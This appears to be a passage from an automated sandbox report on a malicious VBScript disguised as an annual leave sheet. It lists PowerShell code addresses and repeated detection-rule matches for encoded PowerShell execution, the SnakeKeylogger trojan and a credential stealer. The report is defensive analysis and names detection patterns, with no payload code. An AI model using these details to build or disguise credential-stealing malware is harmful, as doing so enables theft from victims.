                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C890
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283788
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283798
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282638
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282637
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07285600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287E78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287E77
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282EE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282EE7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A6D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C528
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C538
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728AD38
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286D18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286D13
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284D4F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284D50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072875B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07281D88
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072855FF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072875C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728645A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07289457
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072844A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728449F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728333B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728B3A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07285BB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07285BB7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283BEF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07281BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287A11
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728BA48
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728BA47
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282A8F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282A90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072882C1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072882D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07288968
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287163
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07288967
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287170
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072851A8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728519A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072821E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072821D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728600F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286010
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A068
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284048
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284041
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072868BA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072848EA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072848F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072868C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072EF7C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072EF7B2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E0548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072ED544
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E0558
                  Source: Annual Leave sheet 2025.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6019 (18 identical entries)
Source: amsi32_1276.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7628.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8000.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_4696.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7892.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7044.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7564.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5044.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5332.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
